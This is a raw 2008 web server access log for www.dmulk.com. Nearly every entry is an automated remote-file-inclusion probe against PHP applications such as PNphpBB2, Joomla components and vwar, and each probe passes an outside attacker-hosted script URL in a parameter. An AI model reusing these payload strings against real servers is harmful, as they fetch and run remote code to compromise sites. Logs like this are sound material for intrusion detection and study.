69.41.187.99 - - [12/Sep/2008:11:06:10 -0700] "GET /logs//home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:06:18 -0700] "GET /logs/access_080308.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:06:18 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:06:19 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:06:27 -0700] "GET /logs/access_080524.log%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:06:36 -0700] "GET /logs/access.log/errors.php?error=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:06:36 -0700] "GET /errors.php?error=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:06:36 -0700] "GET /logs/errors.php?error=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:06:41 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:06:41 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:06:42 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:06:42 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:06:42 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:06:42 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:06:45 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:06:46 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:06:48 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:06:48 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:06:49 -0700] "GET /logs/access.log/errors.php?error=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:06:49 -0700] "GET /errors.php?error=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:06:49 -0700] "GET /logs/errors.php?error=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:06:49 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:06:49 -0700] "GET /skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:06:49 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:06:49 -0700] "GET /logs/access.log/errors.php?error=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:06:50 -0700] "GET /errors.php?error=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:06:50 -0700] "GET /logs/errors.php?error=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:06:50 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:06:50 -0700] "GET /skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:06:50 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:06:50 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:06:50 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:06:50 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:06:51 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:06:51 -0700] "GET /skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:06:51 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:11:06:53 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:06:53 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:11:06:53 -0700] "GET /skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:11:06:54 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:06:54 -0700] "GET /logs/access_080702.log/errors.php?error=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:06:55 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:06:56 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:06:57 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:06:58 -0700] "GET /logs/access_080702.log/errors.php?error=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:06:58 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:06:59 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:06:59 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:11:07:03 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:11:07:04 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.155.50 - - [12/Sep/2008:11:07:04 -0700] "GET /logs/access_080723.log//home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:07:04 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:07:04 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:11:07:04 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:07:05 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:07:05 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:07:06 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:07:06 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:07:08 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:07:08 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:07:08 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:07:09 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:07:09 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:07:09 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.81.114 - - [12/Sep/2008:11:07:16 -0700] "GET /logs/access_080807.log//include/admin.lib.inc.php?site_path=http://www.geocitie.com/dedi_plg2007/injek/bantai.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:07:18 -0700] "GET /logs/access_080502.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:07:18 -0700] "GET /logs/access_080502.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:07:24 -0700] "GET /logs/access_080702.log/errors.php?error=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.31 - - [12/Sep/2008:11:07:24 -0700] "GET /retreat1/?M=D HTTP/1.1" 200 15081 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
70.86.81.114 - - [12/Sep/2008:11:07:25 -0700] "GET /logs/access_080525.log//include/admin.lib.inc.php?site_path=http://www.geocitie.com/dedi_plg2007/injek/bantai.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:07:25 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:07:27 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 200 3711 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:07:28 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:07:31 -0700] "GET /logs/access_080723.log//home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:07:36 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:07:36 -0700] "GET //skin/zero_vote/error.php?dir=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:07:36 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:07:43 -0700] "GET /logs/access_080723.log//home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:07:43 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:07:45 -0700] "GET /logs/access_080502.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:07:46 -0700] "GET /logs/access_080502.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:07:47 -0700] "GET /logs/access_080502.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:07:50 -0700] "GET /logs/access_080502.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:07:57 -0700] "GET /logs/access_080502.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:07:57 -0700] "GET /logs/access_080502.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:11:07:59 -0700] "GET /logs/access_080502.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:11:08:04 -0700] "GET /logs/access_080502.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.141 - - [12/Sep/2008:11:08:05 -0700] "GET /default.php?page=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.141 - - [12/Sep/2008:11:08:05 -0700] "GET /logs/access_080411.log/default.php?page=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.141 - - [12/Sep/2008:11:08:05 -0700] "GET /logs/default.php?page=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.12.123.6 - - [12/Sep/2008:11:08:22 -0700] "GET /logs/access_080502.log//?path%5Bdocroot%5D=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:08:23 -0700] "GET /logs/access_080502.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:08:34 -0700] "GET /logs/access_080502.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:08:35 -0700] "GET /logs/access_080502.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
